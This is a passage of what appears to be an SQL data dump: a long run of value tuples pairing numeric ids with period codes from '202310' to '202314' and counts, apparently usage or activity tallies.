'202310',11),(5280,1,'202310',11),(474,1,'202310',12),(1588,1,'202310',12),(1602,1,'202310',12),(3083,1,'202310',12),(4454,1,'202310',12),(4551,1,'202310',12),(4663,1,'202310',12),(4709,1,'202310',12),(4722,1,'202310',12),(5253,1,'202310',12),(108,1,'202310',13),(2297,1,'202310',13),(2309,1,'202310',13),(4457,1,'202310',13),(4520,1,'202310',13),(4706,1,'202310',13),(5128,1,'202310',13),(1724,1,'202310',14),(1728,1,'202310',14),(4674,1,'202310',14),(84,1,'202310',15),(1612,1,'202310',15),(5276,1,'202310',15),(2809,1,'202310',16),(4930,1,'202310',16),(5256,1,'202310',16),(1582,1,'202310',17),(1610,1,'202310',17),(5259,1,'202310',17),(3764,1,'202310',19),(1586,1,'202310',20),(87,1,'202310',21),(335,1,'202310',22),(1596,1,'202310',22),(5163,1,'202310',22),(91,1,'202310',23),(1594,1,'202310',24),(76,1,'202310',25),(68,1,'202310',27),(72,1,'202310',33),(89,1,'202310',39),(2904,1,'202310',67),(80,1,'202310',73),(9,1,'202310',486),(471,1,'202311',1),(3278,1,'202311',1),(3282,1,'202311',1),(3724,1,'202311',1),(3735,1,'202311',1),(3738,1,'202311',1),(3771,1,'202311',1),(4368,1,'202311',1),(4382,1,'202311',1),(4400,1,'202311',1),(4404,1,'202311',1),(4428,1,'202311',1),(4440,1,'202311',1),(4514,1,'202311',1),(4591,1,'202311',1),(4697,1,'202311',1),(4741,1,'202311',1),(4744,1,'202311',1),(4750,1,'202311',1),(4756,1,'202311',1),(4870,1,'202311',1),(4878,1,'202311',1),(4988,1,'202311',1),(481,1,'202311',2),(482,1,'202311',2),(1695,1,'202311',2),(1697,1,'202311',2),(1707,1,'202311',2),(1774,1,'202311',2),(2148,1,'202311',2),(2152,1,'202311',2),(2161,1,'202311',2),(2293,1,'202311',2),(2296,1,'202311',2),(2748,1,'202311',2),(2775,1,'202311',2),(2911,1,'202311',2),(2956,1,'202311',2),(2991,1,'202311',2),(2993,1,'202311',2),(3023,1,'202311',2),(3027,1,'202311',2),(3034,1,'202311',2),(3109,1,'202311',2),(3240,1,'202311',2),(3251,1,'202311',2),(3253,1,'202311',2),(3257,1,'202311',2),(3261,1,'202311',2),(3263,1,'202311',2),(3265,1,'202311',2),(3273,1,'202311',2),(3280,1,'202311',2),(3313,1,'202311',2),(3438,1,'202311',2),(3498,1,'202311',2),(3531,1,'202311',2),(3714,1,'202311',2),(3731,1,'202311',2),(3742,1,'202311',2),(3749,1,'202311',2),(3777,1,'202311',2),(4332,1,'202311',2),(4396,1,'202311',2),(4408,1,'202311',2),(4420,1,'202311',2),(4424,1,'202311',2),(4444,1,'202311',2),(4448,1,'202311',2),(4566,1,'202311',2),(4582,1,'202311',2),(4651,1,'202311',2),(4657,1,'202311',2),(4660,1,'202311',2),(4685,1,'202311',2),(4747,1,'202311',2),(4776,1,'202311',2),(4858,1,'202311',2),(4874,1,'202311',2),(4888,1,'202311',2),(4893,1,'202311',2),(5146,1,'202311',2),(110,1,'202311',3),(479,1,'202311',3),(1592,1,'202311',3),(1604,1,'202311',3),(1699,1,'202311',3),(1705,1,'202311',3),(1713,1,'202311',3),(1720,1,'202311',3),(1726,1,'202311',3),(1730,1,'202311',3),(1734,1,'202311',3),(1739,1,'202311',3),(1743,1,'202311',3),(1776,1,'202311',3),(1778,1,'202311',3),(1780,1,'202311',3),(2063,1,'202311',3),(2156,1,'202311',3),(2165,1,'202311',3),(2558,1,'202311',3),(2801,1,'202311',3),(2813,1,'202311',3),(3038,1,'202311',3),(3041,1,'202311',3),(3079,1,'202311',3),(3096,1,'202311',3),(3097,1,'202311',3),(3104,1,'202311',3),(3107,1,'202311',3),(3127,1,'202311',3),(3243,1,'202311',3),(3245,1,'202311',3),(3249,1,'202311',3),(3267,1,'202311',3),(3269,1,'202311',3),(3271,1,'202311',3),(3275,1,'202311',3),(3285,1,'202311',3),(3290,1,'202311',3),(3297,1,'202311',3),(3307,1,'202311',3),(3316,1,'202311',3),(3489,1,'202311',3),(3710,1,'202311',3),(3721,1,'202311',3),(3752,1,'202311',3),(3774,1,'202311',3),(4238,1,'202311',3),(4275,1,'202311',3),(4329,1,'202311',3),(4335,1,'202311',3),(4373,1,'202311',3),(4517,1,'202311',3),(4529,1,'202311',3),(4542,1,'202311',3),(4546,1,'202311',3),(4587,1,'202311',3),(4654,1,'202311',3),(4668,1,'202311',3),(4681,1,'202311',3),(4694,1,'202311',3),(4765,1,'202311',3),(4802,1,'202311',3),(4866,1,'202311',3),(4883,1,'202311',3),(4897,1,'202311',3),(4996,1,'202311',3),(5131,1,'202311',3),(5134,1,'202311',3),(5137,1,'202311',3),(106,1,'202311',4),(473,1,'202311',4),(476,1,'202311',4),(478,1,'202311',4),(483,1,'202311',4),(484,1,'202311',4),(486,1,'202311',4),(1590,1,'202311',4),(1711,1,'202311',4),(1732,1,'202311',4),(1737,1,'202311',4),(1749,1,'202311',4),(1768,1,'202311',4),(1770,1,'202311',4),(1782,1,'202311',4),(2248,1,'202311',4),(2751,1,'202311',4),(2964,1,'202311',4),(3004,1,'202311',4),(3087,1,'202311',4),(3287,1,'202311',4),(3486,1,'202311',4),(4326,1,'202311',4),(4357,1,'202311',4),(4377,1,'202311',4),(4432,1,'202311',4),(4648,1,'202311',4),(4712,1,'202311',4),(4753,1,'202311',4),(4762,1,'202311',4),(4768,1,'202311',4),(4792,1,'202311',4),(4862,1,'202311',4),(4977,1,'202311',4),(4983,1,'202311',4),(5020,1,'202311',4),(5046,1,'202311',4),(5054,1,'202311',4),(5058,1,'202311',4),(5101,1,'202311',4),(5248,1,'202311',4),(5268,1,'202311',4),(102,1,'202311',5),(467,1,'202311',5),(474,1,'202311',5),(477,1,'202311',5),(488,1,'202311',5),(1584,1,'202311',5),(1608,1,'202311',5),(1701,1,'202311',5),(1709,1,'202311',5),(1745,1,'202311',5),(1772,1,'202311',5),(2252,1,'202311',5),(2617,1,'202311',5),(2658,1,'202311',5),(3006,1,'202311',5),(3063,1,'202311',5),(3072,1,'202311',5),(3092,1,'202311',5),(3102,1,'202311',5),(3229,1,'202311',5),(3430,1,'202311',5),(3479,1,'202311',5),(3482,1,'202311',5),(3534,1,'202311',5),(3746,1,'202311',5),(4301,1,'202311',5),(4341,1,'202311',5),(4416,1,'202311',5),(4524,1,'202311',5),(4703,1,'202311',5),(4759,1,'202311',5),(4976,1,'202311',5),(5037,1,'202311',5),(5042,1,'202311',5),(5067,1,'202311',5),(485,1,'202311',6),(1703,1,'202311',6),(1715,1,'202311',6),(1718,1,'202311',6),(1741,1,'202311',6),(1747,1,'202311',6),(2609,1,'202311',6),(2769,1,'202311',6),(3005,1,'202311',6),(3060,1,'202311',6),(3090,1,'202311',6),(3117,1,'202311',6),(3226,1,'202311',6),(3259,1,'202311',6),(4391,1,'202311',6),(4930,1,'202311',6),(4980,1,'202311',6),(5024,1,'202311',6),(5050,1,'202311',6),(5071,1,'202311',6),(5125,1,'202311',6),(5140,1,'202311',6),(5157,1,'202311',6),(5264,1,'202311',6),(5271,1,'202311',6),(469,1,'202311',7),(472,1,'202311',7),(487,1,'202311',7),(570,1,'202311',7),(1614,1,'202311',7),(1766,1,'202311',7),(2159,1,'202311',7),(2297,1,'202311',7),(2965,1,'202311',7),(2989,1,'202311',7),(3045,1,'202311',7),(3069,1,'202311',7),(4323,1,'202311',7),(4612,1,'202311',7),(4700,1,'202311',7),(5028,1,'202311',7),(5259,1,'202311',7),(468,1,'202311',8),(480,1,'202311',8),(2150,1,'202311',8),(2154,1,'202311',8),(2178,1,'202311',8),(4387,1,'202311',8),(4608,1,'202311',8),(4645,1,'202311',8),(4706,1,'202311',8),(5122,1,'202311',8),(74,1,'202311',9),(1722,1,'202311',9),(2704,1,'202311',9),(4674,1,'202311',9),(4722,1,'202311',9),(5062,1,'202311',9),(5153,1,'202311',9),(470,1,'202311',10),(2457,1,'202311',10),(2503,1,'202311',10),(4436,1,'202311',10),(4454,1,'202311',10),(4677,1,'202311',10),(5276,1,'202311',10),(87,1,'202311',11),(1598,1,'202311',11),(1606,1,'202311',11),(2809,1,'202311',11),(4709,1,'202311',11),(5076,1,'202311',11),(5080,1,'202311',11),(5128,1,'202311',11),(108,1,'202311',12),(3066,1,'202311',12),(4338,1,'202311',12),(4520,1,'202311',12),(4551,1,'202311',12),(84,1,'202311',13),(1586,1,'202311',13),(1600,1,'202311',13),(1724,1,'202311',13),(1728,1,'202311',13),(2804,1,'202311',13),(3781,1,'202311',13),(1588,1,'202311',14),(3030,1,'202311',14),(4412,1,'202311',14),(4556,1,'202311',14),(5253,1,'202311',14),(5280,1,'202311',14),(335,1,'202311',15),(1544,1,'202311',15),(76,1,'202311',16),(4663,1,'202311',16),(89,1,'202311',18),(1612,1,'202311',18),(4457,1,'202311',18),(5256,1,'202311',18),(68,1,'202311',19),(5033,1,'202311',19),(3083,1,'202311',20),(1602,1,'202311',21),(91,1,'202311',22),(2309,1,'202311',22),(5163,1,'202311',23),(3764,1,'202311',25),(1594,1,'202311',26),(1582,1,'202311',27),(1610,1,'202311',28),(72,1,'202311',30),(2904,1,'202311',30),(1596,1,'202311',32),(80,1,'202311',80),(9,1,'202311',472),(1741,1,'202312',1),(1747,1,'202312',1),(3063,1,'202312',1),(3087,1,'202312',1),(3109,1,'202312',1),(3229,1,'202312',1),(3269,1,'202312',1),(4648,1,'202312',1),(4651,1,'202312',1),(4657,1,'202312',1),(4792,1,'202312',1),(4893,1,'202312',1),(4897,1,'202312',1),(5042,1,'202312',1),(478,1,'202312',2),(1705,1,'202312',2),(1707,1,'202312',2),(1730,1,'202312',2),(1734,1,'202312',2),(1772,1,'202312',2),(1782,1,'202312',2),(2150,1,'202312',2),(2152,1,'202312',2),(2156,1,'202312',2),(3079,1,'202312',2),(3092,1,'202312',2),(3104,1,'202312',2),(3240,1,'202312',2),(3247,1,'202312',2),(3253,1,'202312',2),(3259,1,'202312',2),(3482,1,'202312',2),(4275,1,'202312',2),(4341,1,'202312',2),(4373,1,'202312',2),(4400,1,'202312',2),(4404,1,'202312',2),(4587,1,'202312',2),(4654,1,'202312',2),(4744,1,'202312',2),(4753,1,'202312',2),(4802,1,'202312',2),(4858,1,'202312',2),(4862,1,'202312',2),(4878,1,'202312',2),(4883,1,'202312',2),(4976,1,'202312',2),(5020,1,'202312',2),(5024,1,'202312',2),(5028,1,'202312',2),(5050,1,'202312',2),(5054,1,'202312',2),(5058,1,'202312',2),(5125,1,'202312',2),(110,1,'202312',3),(471,1,'202312',3),(480,1,'202312',3),(484,1,'202312',3),(1584,1,'202312',3),(1699,1,'202312',3),(1713,1,'202312',3),(1718,1,'202312',3),(1743,1,'202312',3),(1749,1,'202312',3),(1768,1,'202312',3),(1774,1,'202312',3),(1778,1,'202312',3),(2063,1,'202312',3),(2165,1,'202312',3),(2252,1,'202312',3),(2293,1,'202312',3),(2297,1,'202312',3),(2617,1,'202312',3),(2704,1,'202312',3),(2748,1,'202312',3),(2956,1,'202312',3),(3023,1,'202312',3),(3027,1,'202312',3),(3045,1,'202312',3),(3096,1,'202312',3),(3097,1,'202312',3),(3249,1,'202312',3),(3267,1,'202312',3),(3271,1,'202312',3),(3275,1,'202312',3),(3278,1,'202312',3),(3287,1,'202312',3),(3297,1,'202312',3),(3430,1,'202312',3),(3498,1,'202312',3),(3534,1,'202312',3),(3541,1,'202312',3),(3724,1,'202312',3),(3727,1,'202312',3),(3731,1,'202312',3),(3749,1,'202312',3),(3771,1,'202312',3),(3774,1,'202312',3),(4329,1,'202312',3),(4368,1,'202312',3),(4396,1,'202312',3),(4546,1,'202312',3),(4681,1,'202312',3),(4750,1,'202312',3),(4756,1,'202312',3),(4768,1,'202312',3),(4771,1,'202312',3),(4797,1,'202312',3),(4866,1,'202312',3),(4870,1,'202312',3),(4888,1,'202312',3),(4988,1,'202312',3),(5046,1,'202312',3),(5062,1,'202312',3),(5071,1,'202312',3),(5131,1,'202312',3),(5134,1,'202312',3),(5146,1,'202312',3),(5153,1,'202312',3),(5248,1,'202312',3),(467,1,'202312',4),(476,1,'202312',4),(479,1,'202312',4),(485,1,'202312',4),(486,1,'202312',4),(1590,1,'202312',4),(1697,1,'202312',4),(1701,1,'202312',4),(1709,1,'202312',4),(1715,1,'202312',4),(1726,1,'202312',4),(1737,1,'202312',4),(1739,1,'202312',4),(1751,1,'202312',4),(1780,1,'202312',4),(2148,1,'202312',4),(2161,1,'202312',4),(2248,1,'202312',4),(2296,1,'202312',4),(2558,1,'202312',4),(2964,1,'202312',4),(3005,1,'202312',4),(3006,1,'202312',4),(3038,1,'202312',4),(3090,1,'202312',4),(3107,1,'202312',4),(3127,1,'202312',4),(3261,1,'202312',4),(3265,1,'202312',4),(3280,1,'202312',4),(3282,1,'202312',4),(3313,1,'202312',4),(3316,1,'202312',4),(3438,1,'202312',4),(3486,1,'202312',4),(3710,1,'202312',4),(3714,1,'202312',4),(3735,1,'202312',4),(3742,1,'202312',4),(3777,1,'202312',4),(4323,1,'202312',4),(4382,1,'202312',4),(4416,1,'202312',4),(4432,1,'202312',4),(4440,1,'202312',4),(4514,1,'202312',4),(4524,1,'202312',4),(4582,1,'202312',4),(4591,1,'202312',4),(4660,1,'202312',4),(4741,1,'202312',4),(4747,1,'202312',4),(4762,1,'202312',4),(4765,1,'202312',4),(4980,1,'202312',4),(4983,1,'202312',4),(5101,1,'202312',4),(5157,1,'202312',4),(5264,1,'202312',4),(102,1,'202312',5),(482,1,'202312',5),(483,1,'202312',5),(488,1,'202312',5),(1695,1,'202312',5),(1720,1,'202312',5),(1732,1,'202312',5),(1745,1,'202312',5),(1770,1,'202312',5),(2154,1,'202312',5),(2178,1,'202312',5),(2751,1,'202312',5),(2989,1,'202312',5),(3004,1,'202312',5),(3041,1,'202312',5),(3245,1,'202312',5),(3257,1,'202312',5),(3285,1,'202312',5),(3290,1,'202312',5),(3479,1,'202312',5),(3721,1,'202312',5),(3738,1,'202312',5),(3746,1,'202312',5),(3752,1,'202312',5),(4326,1,'202312',5),(4332,1,'202312',5),(4335,1,'202312',5),(4363,1,'202312',5),(4377,1,'202312',5),(4387,1,'202312',5),(4408,1,'202312',5),(4424,1,'202312',5),(4444,1,'202312',5),(4448,1,'202312',5),(4542,1,'202312',5),(4685,1,'202312',5),(4691,1,'202312',5),(4712,1,'202312',5),(4759,1,'202312',5),(4874,1,'202312',5),(5037,1,'202312',5),(5067,1,'202312',5),(5122,1,'202312',5),(5140,1,'202312',5),(5271,1,'202312',5),(469,1,'202312',6),(470,1,'202312',6),(474,1,'202312',6),(477,1,'202312',6),(481,1,'202312',6),(1711,1,'202312',6),(1776,1,'202312',6),(2658,1,'202312',6),(2911,1,'202312',6),(2965,1,'202312',6),(2991,1,'202312',6),(2993,1,'202312',6),(3117,1,'202312',6),(3124,1,'202312',6),(3243,1,'202312',6),(3251,1,'202312',6),(3263,1,'202312',6),(3307,1,'202312',6),(3489,1,'202312',6),(4428,1,'202312',6),(4517,1,'202312',6),(4608,1,'202312',6),(4668,1,'202312',6),(4776,1,'202312',6),(5137,1,'202312',6),(472,1,'202312',7),(2159,1,'202312',7),(2775,1,'202312',7),(2813,1,'202312',7),(3034,1,'202312',7),(3072,1,'202312',7),(3102,1,'202312',7),(3226,1,'202312',7),(3273,1,'202312',7),(4301,1,'202312',7),(4357,1,'202312',7),(4412,1,'202312',7),(4420,1,'202312',7),(4566,1,'202312',7),(4722,1,'202312',7),(5080,1,'202312',7),(5259,1,'202312',7),(5268,1,'202312',7),(473,1,'202312',8),(3060,1,'202312',8),(3531,1,'202312',8),(4612,1,'202312',8),(4688,1,'202312',8),(4694,1,'202312',8),(4697,1,'202312',8),(4703,1,'202312',8),(4996,1,'202312',8),(5076,1,'202312',8),(1608,1,'202312',9),(2503,1,'202312',9),(2769,1,'202312',9),(4529,1,'202312',9),(4556,1,'202312',9),(487,1,'202312',10),(1606,1,'202312',10),(1614,1,'202312',10),(1722,1,'202312',10),(2457,1,'202312',10),(2801,1,'202312',10),(4238,1,'202312',10),(4391,1,'202312',10),(4454,1,'202312',10),(5253,1,'202312',10),(5280,1,'202312',10),(5301,1,'202312',10),(5304,1,'202312',10),(74,1,'202312',11),(108,1,'202312',11),(468,1,'202312',11),(1592,1,'202312',11),(2609,1,'202312',11),(4700,1,'202312',11),(1604,1,'202312',12),(1703,1,'202312',12),(1766,1,'202312',12),(4674,1,'202312',12),(4709,1,'202312',12),(4977,1,'202312',12),(5256,1,'202312',12),(5289,1,'202312',12),(5307,1,'202312',12),(1724,1,'202312',13),(4338,1,'202312',13),(4677,1,'202312',13),(4930,1,'202312',13),(5276,1,'202312',13),(5310,1,'202312',13),(1728,1,'202312',14),(3069,1,'202312',14),(5295,1,'202312',14),(570,1,'202312',15),(1594,1,'202312',15),(2804,1,'202312',15),(4436,1,'202312',15),(4645,1,'202312',15),(5128,1,'202312',15),(5292,1,'202312',15),(3030,1,'202312',16),(5298,1,'202312',16),(84,1,'202312',17),(1600,1,'202312',17),(1602,1,'202312',17),(3066,1,'202312',17),(4551,1,'202312',17),(4663,1,'202312',17),(4706,1,'202312',17),(89,1,'202312',18),(5033,1,'202312',18),(87,1,'202312',19),(1544,1,'202312',19),(1610,1,'202312',20),(3083,1,'202312',20),(76,1,'202312',21),(335,1,'202312',21),(1588,1,'202312',21),(1598,1,'202312',21),(2809,1,'202312',21),(4520,1,'202312',22),(68,1,'202312',23),(91,1,'202312',23),(5163,1,'202312',23),(2309,1,'202312',25),(4457,1,'202312',25),(1612,1,'202312',26),(1596,1,'202312',27),(3781,1,'202312',27),(1586,1,'202312',30),(1582,1,'202312',33),(3764,1,'202312',33),(72,1,'202312',36),(2904,1,'202312',42),(80,1,'202312',84),(9,1,'202312',527),(1720,1,'202313',1),(2161,1,'202313',1),(3257,1,'202313',1),(3273,1,'202313',1),(3280,1,'202313',1),(3438,1,'202313',1),(3774,1,'202313',1),(4387,1,'202313',1),(4440,1,'202313',1),(4688,1,'202313',1),(1590,1,'202313',2),(1703,1,'202313',2),(1715,1,'202313',2),(1726,1,'202313',2),(1749,1,'202313',2),(2152,1,'202313',2),(2154,1,'202313',2),(2156,1,'202313',2),(2252,1,'202313',2),(2801,1,'202313',2),(2993,1,'202313',2),(3243,1,'202313',2),(3265,1,'202313',2),(3297,1,'202313',2),(3316,1,'202313',2),(3541,1,'202313',2),(3727,1,'202313',2),(3738,1,'202313',2),(3742,1,'202313',2),(3771,1,'202313',2),(4382,1,'202313',2),(4408,1,'202313',2),(4424,1,'202313',2),(4582,1,'202313',2),(4691,1,'202313',2),(4694,1,'202313',2),(4697,1,'202313',2),(4883,1,'202313',2),(4888,1,'202313',2),(5037,1,'202313',2),(102,1,'202313',3),(106,1,'202313',3),(110,1,'202313',3),(476,1,'202313',3),(1695,1,'202313',3),(1697,1,'202313',3),(1707,1,'202313',3),(1709,1,'202313',3),(1713,1,'202313',3),(1732,1,'202313',3),(1734,1,'202313',3),(1739,1,'202313',3),(1741,1,'202313',3),(1743,1,'202313',3),(1751,1,'202313',3),(1768,1,'202313',3),(1772,1,'202313',3),(1780,1,'202313',3),(1782,1,'202313',3),(2558,1,'202313',3),(2964,1,'202313',3),(3027,1,'202313',3),(3034,1,'202313',3),(3087,1,'202313',3),(3097,1,'202313',3),(3226,1,'202313',3),(3229,1,'202313',3),(3240,1,'202313',3),(3249,1,'202313',3),(3259,1,'202313',3),(3267,1,'202313',3),(3269,1,'202313',3),(3271,1,'202313',3),(3282,1,'202313',3),(3307,1,'202313',3),(3735,1,'202313',3),(3752,1,'202313',3),(4332,1,'202313',3),(4363,1,'202313',3),(4373,1,'202313',3),(4396,1,'202313',3),(4432,1,'202313',3),(4529,1,'202313',3),(4546,1,'202313',3),(4587,1,'202313',3),(4591,1,'202313',3),(4648,1,'202313',3),(4654,1,'202313',3),(4685,1,'202313',3),(4712,1,'202313',3),(4870,1,'202313',3),(4878,1,'202313',3),(5020,1,'202313',3),(5024,1,'202313',3),(5046,1,'202313',3),(5054,1,'202313',3),(5067,1,'202313',3),(5259,1,'202313',3),(5264,1,'202313',3),(481,1,'202313',4),(482,1,'202313',4),(1699,1,'202313',4),(1718,1,'202313',4),(1730,1,'202313',4),(1776,1,'202313',4),(1778,1,'202313',4),(2063,1,'202313',4),(2178,1,'202313',4),(2293,1,'202313',4),(2751,1,'202313',4),(2813,1,'202313',4),(2911,1,'202313',4),(2956,1,'202313',4),(2965,1,'202313',4),(2991,1,'202313',4),(3038,1,'202313',4),(3041,1,'202313',4),(3096,1,'202313',4),(3109,1,'202313',4),(3127,1,'202313',4),(3245,1,'202313',4),(3247,1,'202313',4),(3251,1,'202313',4),(3261,1,'202313',4),(3275,1,'202313',4),(3287,1,'202313',4),(3531,1,'202313',4),(3721,1,'202313',4),(3724,1,'202313',4),(3731,1,'202313',4),(3749,1,'202313',4),(4275,1,'202313',4),(4301,1,'202313',4),(4326,1,'202313',4),(4368,1,'202313',4),(4391,1,'202313',4),(4428,1,'202313',4),(4444,1,'202313',4),(4514,1,'202313',4),(4517,1,'202313',4),(4566,1,'202313',4),(4651,1,'202313',4),(4668,1,'202313',4),(4681,1,'202313',4),(4703,1,'202313',4),(4741,1,'202313',4),(4744,1,'202313',4),(4771,1,'202313',4),(4776,1,'202313',4),(4858,1,'202313',4),(4862,1,'202313',4),(4866,1,'202313',4),(4874,1,'202313',4),(4897,1,'202313',4),(4976,1,'202313',4),(4988,1,'202313',4),(5028,1,'202313',4),(5050,1,'202313',4),(5080,1,'202313',4),(5101,1,'202313',4),(5125,1,'202313',4),(5137,1,'202313',4),(5140,1,'202313',4),(5146,1,'202313',4),(5157,1,'202313',4),(5248,1,'202313',4),(5271,1,'202313',4),(479,1,'202313',5),(483,1,'202313',5),(484,1,'202313',5),(1606,1,'202313',5),(1705,1,'202313',5),(1747,1,'202313',5),(1774,1,'202313',5),(2165,1,'202313',5),(2769,1,'202313',5),(2989,1,'202313',5),(3006,1,'202313',5),(3045,1,'202313',5),(3060,1,'202313',5),(3072,1,'202313',5),(3092,1,'202313',5),(3104,1,'202313',5),(3117,1,'202313',5),(3124,1,'202313',5),(3253,1,'202313',5),(3263,1,'202313',5),(3285,1,'202313',5),(3290,1,'202313',5),(3313,1,'202313',5),(3430,1,'202313',5),(3479,1,'202313',5),(3482,1,'202313',5),(3489,1,'202313',5),(3498,1,'202313',5),(3714,1,'202313',5),(3746,1,'202313',5),(3777,1,'202313',5),(4377,1,'202313',5),(4400,1,'202313',5),(4542,1,'202313',5),(4556,1,'202313',5),(4612,1,'202313',5),(4660,1,'202313',5),(4750,1,'202313',5),(4756,1,'202313',5),(4762,1,'202313',5),(4765,1,'202313',5),(4792,1,'202313',5),(4802,1,'202313',5),(5042,1,'202313',5),(5058,1,'202313',5),(5062,1,'202313',5),(5122,1,'202313',5),(5131,1,'202313',5),(5134,1,'202313',5),(5268,1,'202313',5),(477,1,'202313',6),(478,1,'202313',6),(485,1,'202313',6),(486,1,'202313',6),(488,1,'202313',6),(1584,1,'202313',6),(1614,1,'202313',6),(1711,1,'202313',6),(1722,1,'202313',6),(1737,1,'202313',6),(1745,1,'202313',6),(2148,1,'202313',6),(2150,1,'202313',6),(2617,1,'202313',6),(2748,1,'202313',6),(2775,1,'202313',6),(3004,1,'202313',6),(3005,1,'202313',6),(3079,1,'202313',6),(3090,1,'202313',6),(3107,1,'202313',6),(3278,1,'202313',6),(3534,1,'202313',6),(3710,1,'202313',6),(4341,1,'202313',6),(4404,1,'202313',6),(4420,1,'202313',6),(4608,1,'202313',6),(4768,1,'202313',6),(4797,1,'202313',6),(4893,1,'202313',6),(4980,1,'202313',6),(4996,1,'202313',6),(5076,1,'202313',6),(5153,1,'202313',6),(5280,1,'202313',6),(467,1,'202313',7),(471,1,'202313',7),(480,1,'202313',7),(1701,1,'202313',7),(2297,1,'202313',7),(2609,1,'202313',7),(3063,1,'202313',7),(3486,1,'202313',7),(4329,1,'202313',7),(4416,1,'202313',7),(4524,1,'202313',7),(4657,1,'202313',7),(4747,1,'202313',7),(4983,1,'202313',7),(5071,1,'202313',7),(469,1,'202313',8),(1604,1,'202313',8),(1770,1,'202313',8),(2296,1,'202313',8),(2704,1,'202313',8),(3023,1,'202313',8),(4357,1,'202313',8),(4412,1,'202313',8),(4753,1,'202313',8),(5289,1,'202313',8),(5326,1,'202313',8),(2159,1,'202313',9),(3102,1,'202313',9),(4335,1,'202313',9),(5330,1,'202313',9),(1766,1,'202313',10),(4448,1,'202313',10),(4759,1,'202313',10),(5292,1,'202313',10),(2248,1,'202313',11),(4977,1,'202313',11),(5295,1,'202313',11),(472,1,'202313',12),(1592,1,'202313',12),(1724,1,'202313',12),(4323,1,'202313',12),(4454,1,'202313',12),(4700,1,'202313',12),(5128,1,'202313',12),(5253,1,'202313',12),(470,1,'202313',13),(2658,1,'202313',13),(2804,1,'202313',13),(3069,1,'202313',13),(4238,1,'202313',13),(4338,1,'202313',13),(4706,1,'202313',13),(5298,1,'202313',13),(5301,1,'202313',13),(5307,1,'202313',13),(474,1,'202313',14),(1728,1,'202313',14),(4709,1,'202313',14),(74,1,'202313',15),(468,1,'202313',15),(4674,1,'202313',15),(108,1,'202313',16),(1598,1,'202313',16),(2457,1,'202313',16),(4677,1,'202313',16),(4722,1,'202313',16),(5276,1,'202313',16),(84,1,'202313',17),(1544,1,'202313',17),(1608,1,'202313',17),(2503,1,'202313',17),(4663,1,'202313',17),(5310,1,'202313',17),(473,1,'202313',18),(487,1,'202313',18),(4551,1,'202313',18),(5033,1,'202313',18),(570,1,'202313',19),(1586,1,'202313',19),(4645,1,'202313',19),(5304,1,'202313',19),(1610,1,'202313',20),(3781,1,'202313',20),(4436,1,'202313',20),(5256,1,'202313',20),(5314,1,'202313',20),(5323,1,'202313',20),(5334,1,'202313',20),(87,1,'202313',21),(1600,1,'202313',21),(1602,1,'202313',21),(3066,1,'202313',22),(3083,1,'202313',22),(4930,1,'202313',22),(1588,1,'202313',23),(2809,1,'202313',23),(3030,1,'202313',23),(4520,1,'202313',23),(89,1,'202313',24),(1582,1,'202313',24),(2309,1,'202313',24),(1594,1,'202313',25),(5320,1,'202313',25),(91,1,'202313',26),(5317,1,'202313',26),(1612,1,'202313',27),(76,1,'202313',28),(68,1,'202313',30),(2904,1,'202313',30),(4457,1,'202313',30),(5163,1,'202313',34),(1596,1,'202313',35),(335,1,'202313',36),(72,1,'202313',41),(3764,1,'202313',50),(80,1,'202313',122),(9,1,'202313',611),(483,1,'202314',1),(1695,1,'202314',1),(1699,1,'202314',1),(1726,1,'202314',1),(1734,1,'202314',1),(1768,1,'202314',1),(1772,1,'202314',1),(1776,1,'202314',1),(2296,1,'202314',1),(2297,1,'202314',1),(2993,1,'202314',1),(3097,1,'202314',1),(3104,1,'202314',1),(3109,1,'202314',1),(3243,1,'202314',1),(3249,1,'202314',1),(3253,1,'202314',1),(3273,1,'202314',1),(3430,1,'202314',1),(3486,1,'202314',1),(3531,1,'202314',1),(3731,1,'202314',1),(3749,1,'202314',1),(4329,1,'202314',1),(4341,1,'202314',1),(4363,1,'202314',1),(4400,1,'202314',1),(4556,1,'202314',1),(4587,1,'202314',1),(4691,1,'202314',1),(4753,1,'202314',1),(4870,1,'202314',1),(4878,1,'202314',1),(4893,1,'202314',1),(4980,1,'202314',1),(5024,1,'202314',1),(5054,1,'202314',1),(110,1,'202314',2),(485,1,'202314',2),(488,1,'202314',2),(1590,1,'202314',2),(1697,1,'202314',2),(1709,1,'202314',2),(1713,1,'202314',2),(1715,1,'202314',2),(1730,1,'202314',2),(1747,1,'202314',2),(1751,1,'202314',2),(1778,1,'202314',2),(1782,1,'202314',2),(2063,1,'202314',2),(2150,1,'202314',2),(2248,1,'202314',2),(2293,1,'202314',2),(2704,1,'202314',2),(3004,1,'202314',2),(3072,1,'202314',2),(3090,1,'202314',2),(3096,1,'202314',2),(3117,1,'202314',2),(3124,1,'202314',2),(3240,1,'202314',2),(3245,1,'202314',2),(3251,1,'202314',2),(3259,1,'202314',2),(3265,1,'202314',2),(3287,1,'202314',2),(3307,1,'202314',2),(3534,1,'202314',2),(3541,1,'202314',2),(3710,1,'202314',2),(3721,1,'202314',2),(3752,1,'202314',2),(3774,1,'202314',2),(4275,1,'202314',2),(4326,1,'202314',2),(4382,1,'202314',2),(4408,1,'202314',2),(4424,1,'202314',2),(4432,1,'202314',2),(4444,1,'202314',2),(4448,1,'202314',2),(4514,1,'202314',2),(4546,1,'202314',2),(4648,1,'202314',2),(4654,1,'202314',2),(4688,1,'202314',2),(4709,1,'202314',2),(4747,1,'202314',2),(4858,1,'202314',2),(4862,1,'202314',2),(4976,1,'202314',2),(4988,1,'202314',2),(5020,1,'202314',2),(5042,1,'202314',2),(5058,1,'202314',2),(5101,1,'202314',2),(5131,1,'202314',2),(5153,1,'202314',2),(5248,1,'202314',2),(474,1,'202314',3),(487,1,'202314',3),(1584,1,'202314',3),(1705,1,'202314',3),(1720,1,'202314',3),(1739,1,'202314',3),(1741,1,'202314',3),(1743,1,'202314',3),(1780,1,'202314',3),(2156,1,'202314',3),(2165,1,'202314',3),(2609,1,'202314',3),(2748,1,'202314',3),(2965,1,'202314',3),(3005,1,'202314',3),(3034,1,'202314',3),(3041,1,'202314',3),(3063,1,'202314',3),(3092,1,'202314',3),(3107,1,'202314',3),(3226,1,'202314',3),(3257,1,'202314',3),(3275,1,'202314',3),(3297,1,'202314',3),(3489,1,'202314',3),(3714,1,'202314',3),(3727,1,'202314',3),(3742,1,'202314',3),(4335,1,'202314',3),(4368,1,'202314',3),(4373,1,'202314',3),(4377,1,'202314',3),(4391,1,'202314',3),(4416,1,'202314',3),(4428,1,'202314',3),(4440,1,'202314',3),(4524,1,'202314',3),(4660,1,'202314',3),(46